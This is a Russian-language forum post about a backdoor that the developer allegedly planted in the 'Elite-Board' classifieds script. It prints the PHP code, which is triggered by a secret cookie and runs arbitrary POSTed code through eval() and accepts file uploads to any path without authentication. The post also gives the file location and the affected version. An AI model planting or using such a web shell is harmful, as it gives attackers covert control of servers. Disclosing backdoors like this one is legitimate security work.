HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Elite-Board - встренный бэкдор (безнадёжная ситуация)
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #1  
Старый 12.10.2016, 03:48
Disasm
Новичок
Регистрация: 10.08.2008
Сообщений: 18
Провел на форуме:
62627

Репутация: 6
По умолчанию
Друзья, всех приветствую! Стараюсь по пустякам не обращаться за помощью, но ситуация складывается абсолютно безнадёжная.

Существует старый, как говно мамонта, скрипт доски объявлений - "Elite-Board", разработчик: http://illusionweb.org/

В данный скрипт разработчик внедрил бэкдор, подробнее: http://searchengines.guru/showthread.php?t=770644

Код бэкдора:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'megasecret'[/COLOR][COLOR="#007700"]]))
{
 if([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'megasecret'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'удалено на всякий случай'[/COLOR][COLOR="#007700"])
 {
 echo[/COLOR][COLOR="#DD0000"]'








stripslashes



'[/COLOR][COLOR="#007700"];
 if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-exe'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
 {
 if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-str'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
 {
[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-exe'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-exe'[/COLOR][COLOR="#007700"]]);
 }
 eval([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-exe'[/COLOR][COLOR="#007700"]]);
 }
 echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
 if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]]))
 {
[/COLOR][COLOR="#0000BB"]move_uploaded_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-path'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]);
 }
 exit();
 }
}[/COLOR][/COLOR
Бэкдор покоится в файле includes/optimizer/admin/funct.php, инклудится при входе в админку (до авторизации, т.е. авторизация не требуется). Бэкдор по стандарту завёрнут в eval(base64_decode()). Сам файл (funct.php) зашифрован зендом.

Бэкдор присутствует в версиях Elite-Board 2.0
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ